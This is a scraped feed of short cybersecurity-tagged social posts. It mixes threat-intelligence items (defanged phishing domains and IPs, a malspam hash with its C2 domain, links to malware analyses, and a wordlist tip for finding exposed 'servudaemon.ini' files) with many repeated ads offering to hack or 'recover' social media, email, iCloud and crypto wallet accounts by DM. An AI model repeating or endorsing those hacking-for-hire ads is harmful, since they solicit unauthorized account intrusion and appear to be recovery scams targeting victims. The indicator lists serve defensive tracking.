【GIGAZINE】パスワード管理ソフトウェア・LastPassの従業員を「AIで複製されたCEOの声」でだまそうとする事案が発生 #cybersecurity #security #news gigazine.net/news/20240418-l… -- IT_security_bot
🚨 icymi - you can catch the replay of the first #MalwareMondays! This series will help build core #malware #analysis and #reverse #engineering skills! Episode 0x01 looks at analyzing #procmon data 👇invidious.no-logs.com/live/b5_PUMmpwjk…Artifacts at:thecy -- jstrosch
#Phishing #SMBC #SMCC #三井住友カード IP:87.121.112.36(AS 34224 / Neterra Ltd. )hxxps://www.chinaresun.com -- KesaGataMe0
Add 'servudaemon.ini' to the wordlist, and maybe you will get juicy data. Enjoy!Created a nuclei template for it: github.com/NoRed0x/nored0x-N…#bugbountytips #bugbountytip #cybersecurity #ethicalhacking -- NoRed0x
From Water to Wine: An Analysis of WINELOADER splunk.com/en_us/blog/securi… #Pentesting #CyberSecurity #Infosec -- ptracesecurity
🎣 Heads up, Windows users! A new corporate #phishing campaign has been exposed by the FortiGuard Labs team. This cunning campaign tricks users into clicking on attachments that deliver remote access Trojans and other #malware: ftnt.net/6010byqoQ via @dark -- SDCarter10
DM for quick recovery.Available 24/7.#gmailhack#gmaildown #hacked #Hacking #hackaccount#hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #lockedaccount #metamask #RansomwareGroup#phishing #Phish #Hackedgmail #Hacked #Hackingtime #hackedinstagr -- shawcracks
ahora DM restaura todas las cuentas sociales y personales. #gmailhack #hackeado #hacking #hackaccount #hacked #facebookdown #whatsapp #hackedinstagram #twitterdown #lockedaccount #metamask #hacked #iloud #missingphone #phishing -- Tayixr33
Is mandatory password expiration helping or hurting your password security?#DataSecurity #Privacy#100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity #CyberAttack #DataProtection#DataBreach #Hacked #Infosec -- WebWizard_inc
8 strange ways emproyees can (accidently) expose databit.ly/3M633Dj#DataSecurity #Privacy#100DaysOfCode #CloudSecurity#MachineLearning #Phishing#Ransomware #Cybersecurity #CyberAttack #DataProtection#DataBreach #Hacked #Infosec -- WebWizard_inc
日本語マルウェアメールの接到を確認しています。 #malspam in Japanese #agentteslaSubject : 100% 支払い確認MD5 : 353b549e5cd77a656cc2a85ffe1c6900C2 : mail[.]geasa[.]hnSample : virustotal.com/gui/file/58a7… (29/61) first posttria.ge/240417-rlp9bach8w/be… -- 58_158_177_102
Recover locked/lost accounts with ease.DM me for all account retrievals.#gmailhack #gmaildown #hacked #Hacking #hackaccount#hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #lockedaccount #metamask #ransomware -- ASTRA_cyberhack
All social media accounts hacking, Infiltration and recovery.#hackedinstagram #TwitterDown #lockedaccount #metamask #ransomware#gmailhack #gmaildown #hacked #Hacking #hackaccount #Facebook #hacked #coinbasesupport #walletphrase -- ASTRA_cyberhack
Offering the best hacking, infiltration and recovery services on all social media accounts. #NFT#hackedinstagram #TwitterDown #lockedaccount #metamask #ransomware#gmailhack #gmaildown #hacked #Hacking #hackaccount #Facebook #coinbasesupport #walletphrase -- ASTRA_cyberhack
As a Cyber security, hacking is easy, DM to Recover or Hack accounts and missing phones. #gmailhack#gmaildown #hacked #Hacking #hackaccount #icloud #facebookdown #imessage #ransomware #snapchat #snapchatsupport #snapchatleak #hacking #discord #XboxSeriesX -- ASTRA_cyberhack
PLDT, Smart block more than 13 million SMShing messages to combat ‘hijack profile’ incidents dlvr.it/T5fQjf #News #Phishing #pldt Click photo to read -- BenteUnodotcom
Explore 7️⃣ common mistakes hindering your #SMB #cybersecurity strategy and discover actionable insights to fortify your defenses: cs.co/6012wuGDr -- Cisco
At #BHAsia, Cisco Security & @Meraki are the official Mobile Device Management, #Malware Analysis, & #DNS Provider. 🛡️Visit the #NOC and attend a presentation to learn more about protecting the network: cs.co/6012bHsan@ThousandEyes @BlackHatEvents -- CiscoSecure
DM for fast and reliable hacking services. #Cybersecurity #Analytics #Al #lloT#Python #RStats #TensorFlow #Reactjs#CloudComputing #Serverless#DataScientist #Linux #100DaysofCode#NodeJS #golang #loT #Blockchain#Bitcoin   #Binanc3 -- CYBER_CAS
Send Me A DM for all digital hacking#MachineLearning #DataScience #SQL#Cybersecurity #BigData #Analytics #Al #lloT #Python #JavaScript #ReactJS#CloudComputing #Serverless#DataScientist #Linux #Programming #Coding #100DaysofCode #NodeJS #golang #NLP #GitHu -- CYBER_CAS
If your account is Hacked or being tampered with all you need is a Good hacker,Inbox now for all Hacking Services.#Hacked #icloud #snapchat #Discord#Roblox #missingphone #privacy#CyberSecurity #cyberattack #Linux#MachineLearning #DataScience#DataAnalytics -- CYBER_CAS
Hacking is way Easier when you contact the right hacker.Inbox me now for all hacking services. #hacked #icloud #imessage #facebookdown #ransomware #snapchat #discord #hacking #xboxshare #robloxseries #Instagram #Discord#100DaysOfHacking #100DaysOfCode -- CYBER_CAS
Hacking is way Easier when you contact the right hacker.Inbox me now for all hacking services. #hacked #icloud #imessage #facebookdown #ransomware #snapchat #discord #hacking #xboxshare #robloxseries #Instagram #Discord#100DaysOfHacking #100DaysOfCode -- CYBER_CAS
Dive deep into protecting Australia's critical infrastructure with our expert panel discussion at the Australian Cyber Security Summit.Book your tickets now!bit.ly/3uHb0e5#AustralianCyberSecuritySummit #technology #cybersecurity #defence #information #IT -- cyberdailyau
⚠️ONION SEARCH ENGINE⚠️This is 'haystak' another onion that allows you to explore and navigate hidden onions on the Dark Web.#CTI #Darknet #DarkWeb #DarkWebInformer #Cybercrime #Cybersecurity #Cyberattack #OSINT #InfosecHave an Onion: haystak5njsmn2hqkewe -- DarkWebInformer
⚠️THE TOR TIMES⚠️This is 'The Tor Times' it was once heavily updated with news from the Dark Web, not so much anymore, but still a GREAT resource.#CTI #Darknet #DarkWeb #DarkWebInformer #Cybercrime #Cybersecurity #Cyberattack #OSINT #InfosecHave an Onion: -- DarkWebInformer
2024/4/18 09:00なぜか東京電力の支払い詐欺に繋がる #迷惑メール ですねメール本文内リンクにアクセスしないようご注意くださいSubject:MasterCardカード:不正使用疑惑のセキュリティチェック#フィッシングメール #Phishing #詐欺メール #インターネット詐欺#TEPCO #東京電力 #MasterCard -- enagatofu
I just came across a tool called AttackGen. It's a simple tool that generates incident scenarios based on a Threat Actor and suggests simulations and possible detections at a high level. #llm #python #threatintel👉 code: github.com/mrwadams/attackge…👉 app: -- fr0gger_
SquareX enables employees to use their browser fearlessly with isolation tools that keep potential threats away from their work device!#cybersecurity -- getsquarex
Cuidado: los “trucos” en los videojuegos pueden esconder grandes problemas de ciberseguridad buff.ly/4aWybR9 #CyberSecurity -- josemiguelnovoa
#Phishing #警視庁 hxxps://soshikihanzaitaisakubumon.cohxxps://naibushimeitehai.cohxxps://tokubetsusosatai.cohxxps://rengososahan.cohxxps://keishicho.co(AS13335 - CLOUDFLARENET) -- KesaGataMe0
#Phishing #ekinet #えきねっと IP:91.204.226.175(AS 205960 / Hdtidc Limited )hxxps://www.huanshijiaoyu.comhxxps://www.jifuxinxi.comhxxps://www.jxdzvip.comhxxps://www.jzlzsgc.comhxxps://www.maomaoyaya.comhxxps://www.mgsxgpl.com -- KesaGataMe0
#Phishing #SMBC #SMCC #三井住友カード IP:103.157.142.89(AS 137443 / ChangLian Network Technology Co., Limited )hxxps://e0dkfa.cnhxxps://el6v0a.cnhxxps://erdvoxd.cnhxxps://erp0lb.cnhxxps://es65yb.cnhxxps://f1ct0a.cnhxxps://fjun4a.cnhxxps://fs7xea.cnhxxps://fsfjdr -- KesaGataMe0
"United Nations Security Council References SlowMist’s Expert Analysis in Recent Report" published by Slowmist. #Cryptocurrency, #Trend, #CTI, #OSINT, #LAZARUS slowmist.medium.com/united-n… -- lazarusholic
"APT43 배후의 다단계 드롭박스 명령과 TutorialRAT" published by Genians. #APT43, #TutorialRAT, #LNK, #CTI, #OSINT, #LAZARUS genians.co.kr/blog/threat_in… -- lazarusholic
Released daily report on our blog2024-04-17 Daily Phishing URL Summarynoladefense.net/2024/04/2024…#phishing #scam #infosec #フィッシング詐欺 -- noladefense
@rockygiglio, Dir. of Security GTM and Solutions at SADA, recently applauded @PaloAltoNtwks's new platform strategy. Simplifying cybersecurity solutions is a "huge win for partners. #PaloAltoNetworks #Cybersecurity #SADA #security READ MORE: ow.ly/LqqE50R -- SADA
#HackingLost your account and need a recovery but don't know how? All you need is a hacker to do the job?Inbox me for help on how to recover your account with immediate effect.#hacked #icloud #facebookdown #imessage #ransomware #snapchat #snapchatsupport -- shawcracks
Now DM restore all social and personal accounts. #Gmailhack #hacked #Hacking #hackaccount #hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #Lockedaccount #metamask #hacked #icloud #missingphone #phishing #Phish #Hackedgmail #Hacked #Hackingti -- shawcracks
Now DM restore all social and personal accounts. #Gmailhack #hacked #Hacking #hackaccount #hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #Lockedaccount #metamask #hacked #icloud #missingphone #phishing #Phish #Hackedgmail #Hacked #Hackingti -- shawcracks
Text me now for any hacking or bypass Active 24/7#anyomous#sadapwhatsapphack #hackinstagrammurah#facebook #hackerstayaway #hackingout#accounthacking #mobilehacking #hackgmail#hacksnapchat #blackhathacker #hackerindia #phishing #Phish #Hackedgmail -- shawcracks
I retrieve all Hacked Snapchat inbox now for guide on how to recover your Account#hacking #snapchatdown #5G #icloud #SNAPCHATLEAKED#phishing #Phish #Hackedgmail #hackedinstagram -- shawcracks
app to get hacked ,text me now if you want to get any Snapchat account hacked #hacked #snapchat #snapchatdown #snapchatleak #hackaccount #hackingtime#phishing #phish #hackedinstagram #Hackingtime #Hacked -- shawcracks
As a Cyber security, hacking is easy, DM to Recover or Hack accounts and missing phones. #gmailhack#gmaildown #hacked #Hacking #hackaccount #icloud #facebookdown #imessage #ransomware #snapchat #snapchatsupport #snapchatleak #hacking #discord #XboxSeriesX -- shawcracks
DM for quick recovery.Available 24/7.#gmailhack#gmaildown #hacked #Hacking #hackaccount#hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #lockedaccount #metamask #RansomwareGroup#phishing #Phish #Hackedgmail #Hacked #Hackingtime #hackedinstagr -- shawcracks
Offering the best hacking, infiltration and recovery services on all social media accounts. #NFT#hackedinstagram #TwitterDown #lockedaccount #metamask #ransomware#gmailhack #gmaildown #hacked #Hacking #hackaccount #Facebook #coinbasesupport #walletphrase -- shawcracks
If it was up to you, to help one young woman chase her dreams of a career in #cybersecurity, would you make that happen with your donation?We need your support to turn the potential of 500 young women across Africa into today's cyber talent and tomorrow's -- sisinerdtweets
AI is making #smartdevices – watches, speakers, doorbells – easier to #hack. Here’s how to stay #safetheconversation.com/ai-is-ma… #fintech #cybersecurity #AI #ArtificialIntelligence #MachineLearning @RMIT @ConversationEDU @mclynd @ChuckDBrooks @ScottBVS -- SpirosMargaris
SAS Introduces Industry-Specific AI Models to Enhance Business Solutions ift.tt/QNyxHM3Get the latest #technology #electricvehicles #apple #iphone #samsung #galaxy #ai #openai #nvidia #space #robotics #cybersecurity and #gaming news on NEWSLINKER! -- thenewslinker
Ever faced a 'We're sorry... access denied' message online? It's all about protecting you and the service from automated threats. #Cybersecurity #TechSafetynews.google.com/rss/articles… -- TrendCryptBlock
Que lindo cuando te llaman para dar una capacitación de #ciberseguridad en otro país y te pagan todo, pero Justo Un Miércoles (el próximo) no puedes. 🥲🥲🥲JUM, se llama nuestro equipo de fútbol, queda validado el nombre.#CyberSecurity -- walterfaguero